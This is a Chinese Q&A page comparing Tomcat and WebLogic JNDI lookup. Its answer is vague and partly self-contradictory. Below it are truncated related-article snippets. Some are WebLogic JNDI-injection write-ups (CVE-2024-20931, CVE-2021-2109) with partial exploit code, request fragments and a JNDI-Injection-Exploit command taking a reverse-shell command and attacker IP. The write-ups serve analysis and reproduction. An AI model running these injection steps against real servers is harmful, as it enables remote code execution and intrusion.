Tomcat vs Weblogic JNDI Lookup

您好！您的问题是关于Tomcat和Weblogic的JNDI查找。以下是我的回答：

Tomcat和Weblogic都是流行的Java应用服务器，它们都支持Java命名和目录接口（JNDI）查找。JNDI查找是Java应用程序查找并访问资源（例如数据库连接、队列、主题等）的一种方式。

在Tomcat和Weblogic中，JNDI查找的实现方式略有不同。在Tomcat中，JNDI查找主要通过Context对象实现，而在Weblogic中，JNDI查找主要通过InitialContext对象实现。

在Tomcat中，JNDI查找的主要步骤如下：

在Tomcat的配置文件中定义资源。
在应用程序的web.xml文件中配置资源引用。
在应用程序的Java代码中使用InitialContext对象查找资源。

在Weblogic中，JNDI查找的主要步骤如下：

在Weblogic的配置文件中定义资源。
在应用程序的web.xml文件中配置资源引用。
在应用程序的Java代码中使用InitialContext对象查找资源。

总的来说，Tomcat和Weblogic在JNDI查找方面的差异并不大，但是它们的配置方式略有不同。如果您需要更详细的信息，我建议您查阅Tomcat和Weblogic的官方文档。

最后，腾讯云提供了一系列云计算服务，包括虚拟机、数据库、存储、容器、网络、安全等，可以满足不同应用场景的需求。如果您需要更多关于腾讯云的信息，请访问我们的官方网站。

相关·内容

Tomcat 6 --- JNDI详解

添加工厂资源实例 server.xml 　　这个文件中可以配置标签，前面说过了；还可以配置全局JNDI资源，比如默认的tomcat就配置了一个userdatabase...("java:comp/env"); //上面写法都是不变的，下面这行中lookup中的字符串就是配置的JNDI名称， //比如context中的或者web.xml...(); Context envCtx = (Context) initCtx.lookup("java:comp/env"); MyBean bean = (MyBean) envCtx.lookup...3 JNDI数据源配置　　这部分就不多说了，参考下面的JNDI配置数据源即可。...参考【1】tomcat 6 JNDI resource : http://tomcat.apache.org/tomcat-6.0-doc/jndi-resources-howto.html 【2】通过

1.2K7 0

java学习：weblogic下JNDI及JDBC连接测试(weblogic环境)

给定一个string类型的key，可以把任何类型的value，放入这个容器（通过bind/rebind方法）；其它地方需要使用该资源时，根据key就能取出该资源（通过lookup方法） JNDI使用示例...： package jmyang.weblogic; /** * Title:JNDI示例(WebLogic环境) * Description: * Copyright...Hashtable ht = new Hashtable(); ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory...JDBC数据源，实际上，也是使用JNDI服务来访问的，下面是JDBC示例代码:(必须先在weblogic中创建数据源) package jmyang.weblogic; /** * Title...服务器地址 static final String webLogicINDIStr = "weblogic.jndi.WLInitialContextFactory";

1.7K9 0

tomcat weblogic 对比

这几天接触到两种Java的web服务器，做项目用的Tomcat，看视频看的是WebLogic Server（WLS），都是web服务器，有什么区别和联系呢？　　...（二）相同点：　　WebLogic和Tomcat都是基于java的基础架构来满足实时处理需求，不同的版本与jdk版本兼容和有所不同;因为都是要和前台交互，所以他们都基于sun公司的servlet来实现的...不过Tomcat配合jboss和apache可以实现j2ee应用服务器功能　　一般来说考虑stucts等架构tomcat就可以了，但如果考虑EJB的话，WebLogic是比较好的选择。　　...这是其它Web应用系统所不具备的所以，在扩展性方面WebLogic是远远超越了Tomcat。　　费用上：　　Tomcat开源免费。　　WebLogic不开源不免费。　　...如jsp，servlet，jndi，web service等实现逻辑　　实现逻辑组件中有各种抽象的方式。

2.8K1 0

Tomcat-9.JNDI资源

1.介绍 Tomcat为每个在其上运行的web应用提供了一个JNDI的** InitialContext**实现实例，它与Java EE应用服务器提供的对应类完全兼容。...此外，Tomcat还提供了一些用于JNDI的特殊选项，需要指定在web应用的元素内，或者位于$CATALINA_BASE/conf/server.xml的<GlobalNamingResources...JNDI命名空间的java:comp/env部分中包含着所有的配置项与资源。...如果工厂的singleton属性被设置为false，那么每当对该项进行lookup时，资源工厂会创建出合适的bean类的新实例。...6.4.1 编写资源工厂类需要编写一个类来实现JNDI服务提供者javax.naming.spi.ObjectFactory接口。

1.2K3 0

Tomcat配置JNDI数据源

本文将介绍Tomcat配置JNDI数据源的方法，主要分为配置局部数据源（仅供单个应用使用）和全局数据源（所有用该Tomcat的应用都可以使用）一、思考从我们学习Web开发以来，我们都是通过程序代码来实现数据库的访问的...而通过JNDI方式访问数据库则更为直接，JNDI连接数据库的方式直接将数据库信息放在Tomcat中，而项目代码里直接通过JNDI技术就可以得到数据源。...他们之间通过定义在Tomcat中的数据源名联系起来。应该说，JNDI方式配置数据源将项目代码与实施部署分离开来了，有利于开发人员和实施部署人员各司其职。...2、配置完数据源之后，你还要把对应的数据库驱动文件放在项目的lib目录或者tomcat的lib目录下。 3、接着，我们写一个简单的Bean，Bean里进行数据库的连接。...InitialContext(); /* 在XML文件中定义的数据源名为:jdbc/dstest */ DataSource ds = (DataSource)ctx.lookup

2K9 0

WebLogic 10 容器通过JNDI切换数据源

Weblogic控制台 http://localhost:7001/console/console.portal 进入后，点击数据源 ? 然后，新建，然后配置连接池 ? 再次查看一般信息 ?...对应工程的xml中配置最后在weblogic...set PRE_CLASSPATH=%WL_HOME%\server\lib\postgresql-9.4-1202-jdbc4.jar set CLASSPATH=%PRE_CLASSPATH%;%WEBLOGIC_CLASSPATH

5974 0

CVE-2024-20931：Weblogic JNDI注入远程命令执行漏洞

此漏洞在2023年10月向Oracle报告，本质上是CVE-2023-21839补丁的一种绕过，牵涉到一个新的JNDI攻击面。...= "weblogic.jndi.WLInitialContextFactory"; // 创建用来远程绑定对象的InitialContext String url = "...remoteJNDIName.set(f, ldap); // 远程绑定ForeignOpaqueReference对象 c.rebind("glassy", f); // lookup...查询ForeignOpaqueReference对象 try { c.lookup("glassy"); } catch (Exception e) {...注入工具： java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的反弹Shell命令" -A "攻击机IP" 利用CVE-2024

4161 0

Java命名和目录接口（JNDI）详解

JNDI的作用 JNDI的主要作用是作为一种服务定位机制，能够将用户抽象出来的服务名称映射到具体的服务实现对象。...JNDI在Java EE中的使用让我们以Java EE应用服务器（如Tomcat、WebLogic、JBoss等）中的数据源作为例子，深入了解JNDI的使用。...你就可以在你的Java EE应用程序中这样使用： Context context = new InitialContext(); DataSource ds = (DataSource) context.lookup...通过使用Context.lookup()方法，我们可以从JNDI中查找到对应的数据源对象。...JNDI的优点 JNDI有一些明显的优点：解耦和灵活性：使用JNDI，应用程序不需要直接创建或管理服务对象。这样，服务对象的创建和配置就可以被集中管理，提高了灵活性。

7211 0

Exploiting Jolokia Agent with Java EE Servers

其中 WAR Agent 支持了多种 Web Server： JBoss 4.2.3, 5.1.0, 6.1.0, 7.0.2, 7.1.1, 8.0.0 Oracle WebLogic 9.2.3.0...熟悉 Java 安全的朋友可能会注意到，这里可能有一个 JNDI 注入。...如上图就获得了 Tomcat 管理员的账号密码，可以通过部署 WAR 文件的方式进行 getshell。 ? 0x02 - Tomcat with Jolokia 1....0x04 Others Weblogic 暴露出很多 MBean，但是有一些方法存在限制： ? 可能会有其他的 MBean 可以进行操作，但是由于 MBean 繁多，没有太多精力去看。...可能会有如下情况：某个 MBean 进行了 JNDI lookup，或者远程下载文件保存在本地，反序列化某一些内容等等，通过 Jolokia 进行操作可以二次利用这些问题来 RCE。

1.7K6 0

Weblogic JNDI远程代码执行漏洞（CVE-2021-2109）

0x01 漏洞描述 - Weblogic JNDI远程代码执行漏洞（CVE-2021-2109） - Weblogic Server是Oracle公司的一款适用于云环境和传统环境的应用服务器，它提供了一个现代轻型开发平台...影响版本： Oracle WebLogic 10.3.6.0.0 Oracle WebLogic 12.1.3.0.0 Oracle WebLogic 12.2.1.3.0 Oracle WebLogic...正常利用管理员帐号登录Weblogic Console控制台的情况下，通过BurpSuite抓取登录后带Cookie数据包进行JNDI注入： GET /console/consolejndi.portal...1764575979 Upgrade-Insecure-Requests: 1 没有登录Weblogic Console控制台的情况下，配合CVE-2020-14882权限绕过漏洞进行JNDI注入： GET...1764575979 Upgrade-Insecure-Requests: 1 没有登录Weblogic Console控制台的情况下，配合CVE-2020-14750权限绕过漏洞进行JNDI注入： GET

9811 0

Tomcat 6 JNDI数据源详解

下面介绍下Tomcat中数据连接池的配置及使用。 ? 介绍　　本篇依赖一个概念——JNDI，可以参考前面的博客：JNDI资源详解。...对于JNDI，可以简单理解成Tomcat中的资源池，通过一些特有的名字与特定的资源相对应，类似一个map，可以简单的通过名字获取到该资源。 ? 　　...而tomcat配置数据源可以在tomcat容器启动时就初始化连接池，停止tomcat时才释放资源，其部署的应用可以根据JNDI的声明，在应用中共享使用该资源。　　...("java:/comp/env"); DataSource ds = (DataSource)envContext.lookup("jdbc/TestDB"); Connection...JNDI Database：http://tomcat.apache.org/tomcat-6.0-doc/jndi-datasource-examples-howto.html

9189 0

Java 中 RMI、JNDI、LADP、JRMP、JMX、JMS那些事儿（上）

WebLogic的RMI注册表与JNDI框架完全集成。...Shiro的JndiTemplate.lookup()： JNDI攻击向量 JNDI主要有以下几种攻击向量： •RMI •JNDI Reference•Remote Object（有安全管理器的限制，...这个攻击过程如下：攻击者为易受攻击的JNDI的lookup方法提供了绝对的RMI URL；服务器连接到受攻击者控制的RMI注册表，该注册表将返回恶意JNDI引用； .服务器解码JNDI引用；服务器从攻击者控制的服务器获取...[11]的"绕过高版本JDK限制：利用LDAP返回序列化数据，触发本地Gadget"部分LDAP与JNDI search() lookup()方式是我们能控制ctx.lookup()参数进行对象的查找，...，也能配合本地GadGet使用•JNDI lookup()与JNDI search()方法不同的利用场景对这些资料进行搜索与整理的过程自己能学到很多，有一些相似性的特征自己可以总结与搜集下。

4.1K1 1

CVE-2021-2109：Weblogic远程代码执行分析复现

0x03 影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0...0x04 环境搭建与CVE-2020-14645复现时的搭建方式相同 0x05 漏洞复现选用jdk-8u181，weblogic12.1.4.0 搭建漏洞环境，因为是通过 JNDI 注入进行的远程命令执行...利用 JNDI 注入工具生成payload https://github.com/welk1n/JNDI-Injection-Exploit ?...我们在 JNDIBindingAction 类的函数 execute 中，看到了 JNDI 注入的关键函数 lookup，通过 lookup 去引用命名服务(RMI)和目录服务(LDAP) console.jar...我们可以看到 lookup 中的值来源于 bindingHandle.getContext() + bindingHandle.getBinding() ，同时要执行到 lookup 需要满足 serverMBean

3.5K1 0

JAVA常见漏洞复现

tomact路径 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 回显**tomcatBinDir{/usr/local/tomcat...比如可以利用JNDI再局域网上定位一台打印机，也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象，RMI注册的服务可以通过JNDI接口来访问和调用。...这样如果不对lookup的出栈进行限制，就有可能让查询指向任何服务（可能是攻击者部署好的恶意代码）。...攻击者可以利用这一点进行JNDI注入，使得受害者请求远程服务来链接本地对象，在lookup的{}里面构造payload，调用JNDI服务（LDAP）向攻击者提前部署好的恶意站点获取恶意的**.class...Weblogic T3反序列化漏洞 Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序（客户端或者其它Weblogic Server实例）之间传输数据

1.3K3 0

JConsole监控远程WebLogic和Tomcat

本文将讲解如何使用JConsole监控远程主机上的WebLogic和Tomcat。...如果配置完成并且启动weblogic后，再关闭weblogic时，会提示端口号已被占用，此问题是因为启动和关闭weblogic时，都会启动对该端口号的监听程序。...三、远程连接redhat+tomcat 1、同上一节第一步，不同的是，tomcat在启动时，设置参数的文件时catalina.sh，因此参数需在此设置。...注意：在启动和关闭tomcat时，都会调用catalina.sh脚本。...如果配置完成并且启动tomcat后，再关闭tomcat时，会提示端口号已被占用，此问题是因为启动和关闭tomcat时，都会启动对该端口号的监听程序。

1.7K1 0

关于 Java 中的 RMI-IIOP

，在16年Blackhat JNDI注入议题中也提到了这个协议的利用，当时想着没太看到或听说有多少关于IIOP的漏洞（可能事实真的如此吧，在下面Weblogic RMI-IIOP部分或许能感受到)，所以那篇文章写作过程中也没去看之前那个...不过事实可能会有些残酷，不然为什么关于RMI-IIOP的漏洞很少看到，看看下面Weblogic RMI-IIOP来感受下。...Weblogic中的RMI-IIOP Weblogic默认是开启了iiop协议的，如果是上面这样的话，看通信数据以及上面的调用过程极大可能是不会经过Weblogic的黑名单了。...一个很尴尬的事情就是，Weblogic默认绑定了远程名称的实现类没有为IIOP实现服务端类与客户端类，但是没有绑定的一些类却实现了，所以默认无法利用了。...总结遗憾就是没有成功在Weblogic中利用到RMI-IIOP，在这里写出来提供一些思路，如果大家有关于RMI-IIOP的其他发现与想法也记得分享下。

1.3K2 0

研判特征流量

应用环境中，因为Tomcat应用环境自带tomcat-dbcp.jar 对于SpringBoot这种自带Tomcat可以直接以单个jar文件部署的需要在maven中配置tomcat- dbcp。...而且对于不同的Tomcat版本使用的poc也不同：Tomcat 8.0以后使用 org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat 8.0以下使用...org.apache.tomcat.dbcp.dbcp.BasicDataSourcelog4j流量特征：原理：该漏洞主要是由于日志在打印时当遇到`${`后，以:号作为分割，将表达式内容分割成两部分，前面一部分...prefix，后面部分作为key，然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行，引发远程代码执行漏洞特征：${jndi：rmistruts2...s=index/\namespace\class/method 正则没写好weblogic：weblogic反序列化基于t3协议shiro：shiro550：硬编码导致密钥可以被爆破，然后利用密钥进行解密和反序列化构建

4731 0

centos部署tomcat_weblogic简单部署

Centos部署weblogic10.3.6 1、下载183 MB压缩包 2、上传至服务器/opt目录下 | root用户执行 3、创建安装组用户和weblogic用户 | root用户执行 su -...groupadd oinstall useraddd -g oinstall weblogic passwd weblogic 备注：已存在weblogic用户useraddd 替换为usermod...cp /opt/wls1036_dev.zip /opt/sso/ 5、解压安装包 | weblogic用户执行 su - weblogic cd /opt/sso unzip weblogic.zip...6、配置weblogic环境变量 | root用户执行 vim /etc/profile #末行追加 export MW_HOME=/opt/sso 7、检查weblogic是否满足安装状态 | weblogic...用户执行 su - weblogic cd /opt/sso sh configure.sh 8、安装weblogic | weblogic用户执行 cd /opt/sso/wlserver/common

3482 0

CVE-2020-14841 weblogic jndi注入绕过分析复现附POC

简介通过diff 升级包中weblogic的黑名单，我们发现新增oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor

2.1K4 0

weblogic EJB 学习

(注释) HelloWorld（ejb名称） HelloWorldEJB（jndi名称） 10（限制不会有超过10个无状态会话bean并发运行） 4 ..../jndi-name> 程序 Content ctx = new InitialContent(); Object h = ctx.lookup... jdbc/DBPool DBPool

1.2K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云